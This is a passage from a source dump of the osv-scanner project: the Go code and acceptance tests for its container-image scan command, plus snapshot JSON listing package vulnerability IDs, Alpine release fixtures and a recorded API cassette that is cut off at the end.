"name": "systemd", "os_package_name": "libudev1", "version": "249.11-0ubuntu3.12", 
"ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7559-1", "UBUNTU-CVE-2023-7008", "UBUNTU-CVE-2025-4598", "UBUNTU-CVE-2026-4105" ] }, { "package": { "name": "util-linux", "os_package_name": "libuuid1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "libzstd", "os_package_name": "libzstd1", "version": "1.4.8+dfsg-3build1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2022-4899" ] }, { "package": { "name": "shadow", "os_package_name": "login", "version": "1:4.8.1-2ubuntu2.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-29383", "UBUNTU-CVE-2024-56433" ] }, { "package": { "name": "util-linux", "os_package_name": "mount", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "ncurses", "os_package_name": "ncurses-base", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "ncurses", "os_package_name": "ncurses-bin", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "shadow", "os_package_name": "passwd", "version": "1:4.8.1-2ubuntu2.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-29383", "UBUNTU-CVE-2024-56433" ] }, { "package": { "name": "perl", "os_package_name": "perl-base", "version": "5.34.0-3ubuntu1.3", "ecosystem": 
"Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7434-1", "USN-7678-1", "UBUNTU-CVE-2023-31486", "UBUNTU-CVE-2023-47039", "UBUNTU-CVE-2024-56406", "UBUNTU-CVE-2025-40909" ] }, { "package": { "name": "tar", "os_package_name": "tar", "version": "1.34+dfsg-1ubuntu0.1.22.04.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2025-45582" ] }, { "package": { "name": "util-linux", "os_package_name": "util-linux", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "zlib", "os_package_name": "zlib1g", "version": "1:1.2.11.dfsg-2ubuntu9.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2026-27171" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "image_metadata": { "os": "Ubuntu 22.04.5 LTS", "layer_metadata": [ { "diff_id": "", "command": "/bin/sh -c #(nop) ARG RELEASE", "is_empty": true, "base_image_index": 2 }, { "diff_id": "", "command": "/bin/sh -c #(nop) ARG LAUNCHPAD_BUILD_ARCH", "is_empty": true, "base_image_index": 2 }, { "diff_id": "", "command": "/bin/sh -c #(nop) LABEL org.opencontainers.image.ref.name=ubuntu", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "/bin/sh -c #(nop) LABEL org.opencontainers.image.version=22.04", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "/bin/sh -c #(nop) ADD file:1b6c8c9518be42fa2afe5e241ca31677fce58d27cdfa88baa91a65a259be3637 in / ", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "/bin/sh -c #(nop) CMD [/"/bin/bash/"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "COPY ./sample-pkgs/fzf_0.29.0-1ubuntu0.1_amd64.deb /tmp/fzf_0.29.0-1ubuntu0.1_amd64.deb # 
buildkit", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c dpkg -i /tmp/fzf_0.29.0-1ubuntu0.1_amd64.deb /u0026/u0026 rm /tmp/fzf_0.29.0-1ubuntu0.1_amd64.deb # buildkit", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { "name": "ubuntu", "tags": null }, { "name": "laurentsogeti/pod_showname_formation_ckad", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/ubuntu_image_with_go_OS_packages_json - 2] Scanning local image tarball "./testdata/test-ubuntu-with-packages.tar" ---
================================================
FILE: cmd/osv-scanner/scan/image/command.go
================================================
// Package image implements the `image` subcommand of the `scan` command.
package image

import (
	"context"
	"errors"
	"fmt"
	"io"
	"net/http"
	"os"
	"path/filepath"
	"strings"

	"github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/helper"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/version"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/google/osv-scanner/v2/pkg/osvscanner"
	"github.com/urfave/cli/v3"
)

// Command builds the `image` subcommand.
//
// The command takes one positional argument: an image reference, or a path to
// an image archive when --archive is set. Its flags are the local --archive
// switch followed by the shared set from helper.BuildCommonScanFlags.
//
// stdout, stderr and client are not used here directly; they are captured by
// the Action closure and forwarded to action, which hands the writers to
// helper.PrintResult and the client to helper.GetExperimentalScannerActions.
func Command(stdout, stderr io.Writer, client *http.Client) *cli.Command {
	return &cli.Command{
		Name:        "image",
		Usage:       "detects vulnerabilities in a container image's dependencies, pulling the image if it's not found locally",
		Description: "detects vulnerabilities in a container image's dependencies, pulling the image if it's not found locally",
		Flags: append([]cli.Flag{
			&cli.BoolFlag{
				Name:  "archive",
				Usage: "input a local archive image (e.g. a tar file)",
			},
			// NOTE(review): "artifact" is presumably the default plugin preset
			// for image scans - confirm against helper.BuildCommonScanFlags.
		}, helper.BuildCommonScanFlags([]string{"artifact"})...),
		ArgsUsage: "[image imageNameWithTag]",
		Action: func(ctx context.Context, cmd *cli.Command) error {
			return action(ctx, cmd, stdout, stderr, client)
		},
	}
}

// action runs a container image scan and writes the result.
//
// Steps, in order:
//  1. Reject a call with no positional argument, and (unless --archive is set)
//     an image argument that contains no ":".
//  2. Resolve the output format and path (--format, --output-file, falling back
//     to --output); --serve forces HTML and, when no path was given, a
//     temporary directory.
//  3. Build the scanner actions from the common flags, the license allowlist
//     and the experimental flags, then call osvscanner.DoContainerScan.
//  4. Print the result, and either serve the HTML report or log its path.
//
// The returned error is nil, osvscanner.ErrVulnerabilitiesFound (returned only
// after the result has been printed), a scan error, or a wrapped output error.
// The context parameter is ignored; see the nolint note at the scan call.
func action(_ context.Context, cmd *cli.Command, stdout, stderr io.Writer, client *http.Client) error {
	if cmd.Args().Len() == 0 {
		return errors.New("please provide an image name or see the help document")
	}

	isImageArchive := cmd.Bool("archive")
	image := cmd.Args().First()
	// This is a substring test, not a reference parse: any ":" satisfies it.
	// NOTE(review): a registry host with a port and no tag (constructed example:
	// "registry.example:5000/app") therefore passes as "tagged" - confirm how
	// DoContainerScan resolves such a name. A tag is also a mutable pointer, so
	// the report describes whatever the tag resolved to at scan time.
	if !isImageArchive && !strings.Contains(image, ":") {
		return fmt.Errorf("%q is not a tagged image name", image)
	}

	format := cmd.String("format")
	// --output-file takes precedence; --output is only read when it is empty.
	outputPath := cmd.String("output-file")
	if outputPath == "" {
		outputPath = cmd.String("output")
	}

	serve := cmd.Bool("serve")
	if serve {
		// Serving always renders HTML, overriding whatever --format said.
		format = "html"
		if outputPath == "" {
			// Create a temporary directory
			// (os.MkdirTemp creates it with mode 0700, so the report is
			// readable only by the invoking user.)
			tmpDir, err := os.MkdirTemp("", "osv-scanner-result")
			if err != nil {
				return fmt.Errorf("failed creating temporary directory: %w\n"+
					"Please use `--output-file result.html` to specify the output path", err)
			}

			// Remove the created temporary directory after
			// NOTE(review): the deferred call runs only when action returns. If
			// helper.ServeHTML blocks until the process is interrupted, the
			// report may be left behind in the temp directory - confirm.
			defer os.RemoveAll(tmpDir)
			outputPath = filepath.Join(tmpDir, "index.html")
		}
	}

	scanLicensesAllowlist, err := helper.GetScanLicensesAllowlist(cmd)
	if err != nil {
		return err
	}

	scannerAction := helper.GetCommonScannerActions(cmd, scanLicensesAllowlist)
	// Same values as the `image` and `isImageArchive` locals above, read again.
	scannerAction.Image = cmd.Args().First()
	scannerAction.IsImageArchive = cmd.Bool("archive")
	scannerAction.ExperimentalScannerActions = helper.GetExperimentalScannerActions(cmd, client)
	// Identifies this subcommand and the scanner version in outgoing requests.
	scannerAction.RequestUserAgent = "osv-scanner_scan-image/" + version.OSVVersion

	var vulnResult models.VulnerabilityResults
	//nolint:contextcheck // passing the context in would be a breaking change
	vulnResult, err = osvscanner.DoContainerScan(scannerAction)

	// With --allow-no-lockfiles an image without any package source is only a
	// warning; the (empty) result is still printed below.
	if cmd.Bool("allow-no-lockfiles") && errors.Is(err, osvscanner.ErrNoPackagesFound) {
		cmdlogger.Warnf("No package sources found")
		err = nil
	}

	// ErrVulnerabilitiesFound is not a failure of the scan itself: keep going so
	// the findings are printed, and return it at the very end.
	if err != nil && !errors.Is(err, osvscanner.ErrVulnerabilitiesFound) {
		return err
	}

	if errPrint := helper.PrintResult(stdout, stderr, outputPath, format, &vulnResult, scannerAction.ShowAllVulns); errPrint != nil {
		return fmt.Errorf("failed to write output: %w", errPrint)
	}

	// Auto-open outputted HTML file for users.
	if outputPath != "" {
		if serve {
			helper.ServeHTML(outputPath)
		} else if format == "html" {
			cmdlogger.Infof("HTML output available at: %s", outputPath)
		}
	}

	// This may be nil.
	return err
}

================================================
FILE: cmd/osv-scanner/scan/image/command_test.go
================================================
package image_test

import (
	"errors"
	"os"
	"runtime"
	"strings"
	"testing"

	"github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd"
	"github.com/google/osv-scanner/v2/internal/testutility"
)

// TestCommand_ExplicitExtractors_WithDefaults scans testdata/test-alpine-sbom.tar
// with different --experimental-plugins / --experimental-disable-plugins
// combinations while the default plugins stay enabled. Every case expects exit
// code 1, including the ones where the added plugins are disabled again.
//
// The test is skipped unless acceptance testing is enabled. Two cases share the
// name "extractors_cancelled_out"; go test reports the second one with a "#01"
// suffix, which is also the name the recorded cassette uses for it.
func TestCommand_ExplicitExtractors_WithDefaults(t *testing.T) {
	t.Parallel()

	testutility.SkipIfNotAcceptanceTesting(t, "Requires docker to build the images")

	client := testcmd.InsertCassette(t)

	tests := []testcmd.Case{
		{
			Name: "add_extractors",
			Args: []string{
				"", "image",
				"--archive",
				"--experimental-plugins=sbom/spdx",
				"--experimental-plugins=sbom/cdx",
				"testdata/test-alpine-sbom.tar",
			},
			Exit: 1,
		},
		{
			Name: "extractors_cancelled_out",
			Args: []string{
				"", "image",
				"--archive",
				"--experimental-plugins=sbom/spdx",
				"--experimental-plugins=sbom/cdx",
				"--experimental-disable-plugins=sbom",
				"testdata/test-alpine-sbom.tar",
			},
			Exit: 1,
		},
		{
			Name: "extractors_cancelled_out_with_presets",
			Args: []string{
				"", "image",
				"--archive",
				"--experimental-plugins=sbom",
				"--experimental-disable-plugins=sbom",
				"testdata/test-alpine-sbom.tar",
			},
			Exit: 1,
		},
		{
			Name: "extractors_cancelled_out",
			Args: []string{
				"", "image",
				"--archive",
				"--experimental-plugins=sbom/spdx,sbom/cdx",
				"--experimental-disable-plugins=sbom",
				"testdata/test-alpine-sbom.tar",
			},
			Exit: 1,
		},
	}

	for _, tt := range tests {
		t.Run(tt.Name, func(t *testing.T) {
			t.Parallel()

			tt.HTTPClient =
testcmd.WithTestNameHeader(t, *client)

			testcmd.RunAndMatchSnapshots(t, tt)
		})
	}
}

// TestCommand_ExplicitExtractors_WithoutDefaults repeats the explicit-plugin
// cases against testdata/test-alpine-sbom.tar with
// --experimental-no-default-plugins added.
//
// With the defaults off, the case that only adds the SBOM plugins still expects
// exit code 1, while every case that disables them again expects exit code 127.
// NOTE(review): presumably 127 is reported because no plugin remains enabled -
// confirm against the snapshots.
//
// Two cases share the name "extractors_cancelled_out"; go test reports the
// second one with a "#01" suffix.
func TestCommand_ExplicitExtractors_WithoutDefaults(t *testing.T) {
	t.Parallel()

	testutility.SkipIfNotAcceptanceTesting(t, "Requires docker to build the images")

	client := testcmd.InsertCassette(t)

	tests := []testcmd.Case{
		{
			Name: "add_extractors",
			Args: []string{
				"", "image",
				"--archive",
				"--experimental-plugins=sbom/spdx",
				"--experimental-plugins=sbom/cdx",
				"--experimental-no-default-plugins",
				"testdata/test-alpine-sbom.tar",
			},
			Exit: 1,
		},
		{
			Name: "extractors_cancelled_out",
			Args: []string{
				"", "image",
				"--archive",
				"--experimental-plugins=sbom/spdx",
				"--experimental-plugins=sbom/cdx",
				"--experimental-disable-plugins=sbom",
				"--experimental-no-default-plugins",
				"testdata/test-alpine-sbom.tar",
			},
			Exit: 127,
		},
		{
			Name: "extractors_cancelled_out_with_presets",
			Args: []string{
				"", "image",
				"--archive",
				"--experimental-plugins=sbom",
				"--experimental-disable-plugins=sbom",
				"--experimental-no-default-plugins",
				"testdata/test-alpine-sbom.tar",
			},
			Exit: 127,
		},
		{
			Name: "extractors_cancelled_out",
			Args: []string{
				"", "image",
				"--archive",
				"--experimental-plugins=sbom/spdx,sbom/cdx",
				"--experimental-disable-plugins=sbom",
				"--experimental-no-default-plugins",
				"testdata/test-alpine-sbom.tar",
			},
			Exit: 127,
		},
	}

	for _, tt := range tests {
		t.Run(tt.Name, func(t *testing.T) {
			t.Parallel()

			tt.HTTPClient = testcmd.WithTestNameHeader(t, *client)

			testcmd.RunAndMatchSnapshots(t, tt)
		})
	}
}

// TestCommand_Docker scans images referenced by name rather than by archive, so
// it needs a working Docker installation.
//
// The table pins the exit code for each kind of input: a missing argument, a
// tag or image that does not exist and an untagged name all expect 127; a real
// image with no packages expects 128, or 0 when --allow-no-lockfiles is passed;
// a real Alpine image expects 1.
//
// The test is skipped unless acceptance testing is enabled, skipped in short
// mode, and each subtest is skipped on any OS other than Linux.
func TestCommand_Docker(t *testing.T) {
	t.Parallel()

	testutility.SkipIfNotAcceptanceTesting(t, "Requires docker (also takes a long time to pull images)")
	testutility.SkipIfShort(t)

	client := testcmd.InsertCassette(t)

	tests := []testcmd.Case{
		{
			Name: "no_image_argument",
			Args: []string{"", "image"},
			Exit: 127,
		},
		{
			Name: "Fake_alpine_image",
			Args: []string{"", "image", "alpine:non-existent-tag"},
			Exit: 127,
		},
		{
			Name: "Fake_image_entirely",
			Args: []string{"", "image", "this-image-definitely-does-not-exist-abcde:with-tag"},
			Exit: 127,
		},
		{
			// No ":" in the argument, so the command rejects it before any pull.
			Name: "Real_empty_image_with_no_tag,_invalid_scan_target",
			Args: []string{"", "image", "hello-world"},
			Exit: 127, // Invalid scan target
		},
		{
			Name: "Real_empty_image_with_tag",
			Args: []string{"", "image", "hello-world:linux"},
			Exit: 128, // No package found
		},
		{
			Name: "real_empty_image_with_tag_and_allow_no_lockfiles_flag",
			Args: []string{"", "image", "--allow-no-lockfiles", "hello-world:linux"},
			Exit: 0,
		},
		{
			Name: "Real_Alpine_image",
			Args: []string{"", "image", "alpine:3.18.9"},
			Exit: 1,
		},
		{
			// this will result in an error about not being able to find any package sources
			// since we've requested the os/apk extractor disabled, and there's nothing else
			// in the image that we support extracting
			Name: "real_alpine_image_without_apk_extractor_enabled",
			Args: []string{"", "image", "--experimental-disable-plugins=os/apk", "alpine:3.18.9"},
			Exit: 128,
		},
	}

	for _, tt := range tests {
		t.Run(tt.Name, func(t *testing.T) {
			t.Parallel()

			// Only test on linux, and mac/windows CI/CD does not come with docker preinstalled
			if runtime.GOOS != "linux" {
				testutility.Skip(t, "Skipping Docker-based test as only Linux has Docker installed in CI")
			}

			tt.HTTPClient = testcmd.WithTestNameHeader(t, *client)

			testcmd.RunAndMatchSnapshots(t, tt)
		})
	}
}

// TestCommand_OCIImage scans image tarballs passed with --archive and compares
// the output with the stored snapshots.
//
// The tarballs under ./testdata/ are not checked by this test's setup: each
// subtest stats every "./testdata/*.tar" argument first and fails with a hint
// to run scripts/build_test_images.sh when one is missing. The test is skipped
// unless acceptance testing is enabled.
func TestCommand_OCIImage(t *testing.T) {
	t.Parallel()

	testutility.SkipIfNotAcceptanceTesting(t, "Requires docker to build the images")

	client := testcmd.InsertCassette(t)

	tests := []testcmd.Case{
		{
			Name: "Invalid_path",
			Args: []string{"", "image", "--archive", "../../testdata/locks-manyoci-image/no-file-here.tar"},
			Exit: 127,
		},
		{
			Name: "Alpine_3.10_image_tar_with_3.18_version_file",
			Args: []string{"", "image", "--archive", "./testdata/test-alpine.tar"},
			Exit: 1,
		},
		{
			Name: "Empty_Ubuntu_22.04_image_tar",
			Args: []string{"", "image", "--archive", "./testdata/test-ubuntu.tar"},
			Exit: 1,
		},
		{
			Name: "Empty_Ubuntu_22.04_image_tar_with_unimportant_vulns",
			Args: []string{"",
"image", "--all-vulns", "--archive", "./testdata/test-ubuntu.tar"}, Exit: 1, }, { Name: "Empty_Ubuntu_20.04_image_tar_with_only_unimportant_vulns_shown", Args: []string{"", "image", "--archive", "--all-vulns", "--config=./testdata/ubuntu20-04-unimportant-config.toml", "--all-vulns", "./testdata/test-ubuntu-20-04.tar"}, Exit: 1, }, { // This tests that unimportant vulns are hidden properly // If the test is failing (reporting new important vulns), add the package that introduced the vuln as ignore=true to the config.toml // The package with unimportant vulns is pcre3, so if a new vulnerability appears for that package, don't ignore the entire package, just ignore the important vulnerability specifically. Name: "Empty_Ubuntu_20.04_image_tar_with_no_vulns_shown", Args: []string{"", "image", "--archive", "--config=./testdata/ubuntu20-04-unimportant-config.toml", "./testdata/test-ubuntu-20-04.tar"}, Exit: 0, }, { // This tests that the fzf go binary is not being reported because it's a OS package Name: "Scanning_Ubuntu_image_with_go_OS_packages_json", Args: []string{"", "image", "--archive", "./testdata/test-ubuntu-with-packages.tar"}, Exit: 1, }, { Name: "Scanning_python_image_with_some_packages", Args: []string{"", "image", "--archive", "./testdata/test-python-full.tar"}, Exit: 1, }, { Name: "Scanning_python_image_with_no_packages", Args: []string{"", "image", "--archive", "./testdata/test-python-empty.tar"}, Exit: 1, }, { Name: "Scanning_java_image_with_some_packages", Args: []string{"", "image", "--archive", "./testdata/test-java-full.tar"}, Exit: 1, }, { Name: "scanning_node_modules_using_npm_with_no_packages", Args: []string{"", "image", "--archive", "./testdata/test-node_modules-npm-empty.tar"}, Exit: 1, }, { Name: "scanning_node_modules_using_npm_with_some_packages", Args: []string{"", "image", "--archive", "./testdata/test-node_modules-npm-full.tar"}, Exit: 1, }, { Name: "scanning_node_modules_using_yarn_with_no_packages", Args: []string{"", "image", 
"--archive", "./testdata/test-node_modules-yarn-empty.tar"}, Exit: 1, }, { Name: "scanning_node_modules_using_yarn_with_some_packages", Args: []string{"", "image", "--archive", "./testdata/test-node_modules-yarn-full.tar"}, Exit: 1, }, { Name: "scanning_node_modules_using_pnpm_with_no_packages", Args: []string{"", "image", "--archive", "./testdata/test-node_modules-pnpm-empty.tar"}, Exit: 1, }, { Name: "scanning_node_modules_using_pnpm_with_some_packages", Args: []string{"", "image", "--archive", "./testdata/test-node_modules-pnpm-full.tar"}, Exit: 1, }, { Name: "scanning_image_with_go_binary", Args: []string{"", "image", "--archive", "./testdata/test-package-tracing.tar"}, Exit: 1, }, { Name: "scanning_insecure_alpine_image_without_detectors", Args: []string{ "", "image", "--archive", "./testdata/test-alpine-etcshadow.tar", }, Exit: 1, }, { Name: "scanning_insecure_alpine_image_with_specific_detector_enabled", Args: []string{ "", "image", "--experimental-plugins", "os/apk", "--experimental-plugins", "weakcredentials/etcshadow", "--archive", "./testdata/test-alpine-etcshadow.tar", }, Exit: 1, }, { Name: "scanning_insecure_alpine_image_with_specific_detector_disabled", Args: []string{ "", "image", "--experimental-plugins", "os/apk", "--experimental-plugins", "weakcreds", "--experimental-disable-plugins", "weakcredentials/etcshadow", "--archive", "./testdata/test-alpine-etcshadow.tar", }, Exit: 1, }, { Name: "scanning_insecure_alpine_image_with_detector_preset", Args: []string{ "", "image", "--experimental-plugins", "os/apk", "--experimental-plugins", "weakcreds", "--archive", "./testdata/test-alpine-etcshadow.tar", }, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() // point out that we need the images to be built and saved separately for _, arg := range tt.Args { if strings.HasPrefix(arg, "./testdata/") && strings.HasSuffix(arg, ".tar") { if _, err := os.Stat(arg); errors.Is(err, os.ErrNotExist) { t.Fatalf("%s does not exist 
- have you run scripts/build_test_images.sh?", arg) } } } tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_OCIImage_JSONFormat(t *testing.T) { t.Parallel() testutility.SkipIfNotAcceptanceTesting(t, "Requires docker to build the images") client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "Scanning_python_image_with_some_packages", Args: []string{"", "image", "--archive", "--format=json", "./testdata/test-python-full.tar"}, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, testutility.NormalizeHistoryCommand, testutility.ShortenHistoryCommandLength, }, }, { Name: "scanning_node_modules_using_npm_with_some_packages", Args: []string{"", "image", "--archive", "--format=json", "./testdata/test-node_modules-npm-full.tar"}, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, testutility.NormalizeHistoryCommand, testutility.ShortenHistoryCommandLength, }, }, { Name: "scanning_image_with_go_binary", Args: []string{"", "image", "--archive", "--all-packages", "--format=json", "./testdata/test-go-binary.tar"}, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, testutility.NormalizeHistoryCommand, }, }, { Name: "scanning_ubuntu_image", Args: []string{"", "image", "--archive", "--format=json", "./testdata/test-ubuntu.tar"}, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, }, }, { // This tests that the fzf go binary is not being reported because it's a OS package Name: "ubuntu_image_with_go_OS_packages_json", Args: []string{"", "image", 
"--archive", "--format=json", "./testdata/test-ubuntu-with-packages.tar"}, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, }, }, { Name: "scanning_insecure_alpine_image_with_specific_detector_enabled", Args: []string{ "", "image", "--format=json", "--experimental-plugins", "os/apk", "--experimental-plugins", "weakcredentials/etcshadow", "--archive", "./testdata/test-alpine-etcshadow.tar", }, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, }, }, { Name: "scanning_insecure_alpine_image_with_detector_preset", Args: []string{ "", "image", "--format=json", "--experimental-plugins", "os/apk", "--experimental-plugins", "weakcreds", "--archive", "./testdata/test-alpine-etcshadow.tar", }, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, }, }, { Name: "scanning_image_with_deprecated_packages", Args: []string{ "", "image", "--format=json", "--experimental-flag-deprecated-packages", "--archive", "./testdata/test-image-with-deprecated.tar", }, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, }, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() // point out that we need the images to be built and saved separately for _, arg := range tt.Args { if strings.HasPrefix(arg, "./testdata/") && strings.HasSuffix(arg, ".tar") { if _, err := os.Stat(arg); errors.Is(err, os.ErrNotExist) { t.Fatalf("%s does not exist - have you run scripts/build_test_images.sh?", arg) } } } tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func 
TestCommand_HtmlFile(t *testing.T) { t.Parallel() testutility.SkipIfNotAcceptanceTesting(t, "Needs built container images") testDir := testutility.CreateTestDir(t) client := testcmd.InsertCassette(t) _, stderr := testcmd.RunAndNormalize(t, testcmd.Case{ Name: "one_specific_supported_lockfile", Args: []string{"", "image", "--format=html", "--output-file", testDir + "/report.html", "--archive", "./testdata/test-alpine.tar", }, Exit: 1, HTTPClient: testcmd.WithTestNameHeader(t, *client), }) testutility.NewSnapshot().WithWindowsReplacements(map[string]string{ "CreateFile": "stat", }).MatchText(t, stderr) _, err := os.Stat(testDir + "/report.html") if err != nil { t.Errorf("Unexpected %v", err) } } ================================================ FILE: cmd/osv-scanner/scan/image/testdata/alpine-3.18-alpine-release ================================================ 3.18.1 ================================================ FILE: cmd/osv-scanner/scan/image/testdata/alpine-3.18-os-release ================================================ / # cat /etc/os-release NAME="Alpine Linux" ID=alpine VERSION_ID=3.18.1 PRETTY_NAME="Alpine Linux v3.18" HOME_URL="https://alpinelinux.org/" BUG_REPORT_URL="https://gitlab.alpinelinux.org/alpine/aports/-/issues" ================================================ FILE: cmd/osv-scanner/scan/image/testdata/cassettes/TestCommand_Docker.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2036 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-baselayout" }, "version": "3.4.3-r1" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-baselayout" }, "version": "3.4.3-r1" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "apk-tools" }, "version": "2.14.4-r0" }, { "package": { "ecosystem": 
"Alpine:v3.18", "name": "busybox" }, "version": "1.36.1-r7" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "busybox" }, "version": "1.36.1-r7" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "ca-certificates" }, "version": "20240226-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "openssl" }, "version": "3.1.7-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "openssl" }, "version": "3.1.7-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "musl" }, "version": "1.2.4-r2" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "musl" }, "version": "1.2.4-r2" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "pax-utils" }, "version": "1.3.7-r1" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "busybox" }, "version": "1.36.1-r7" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "zlib" }, "version": "1.2.13-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Docker/Real_Alpine_image url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 524 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {} ] } headers: Content-Length: - "524" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: 
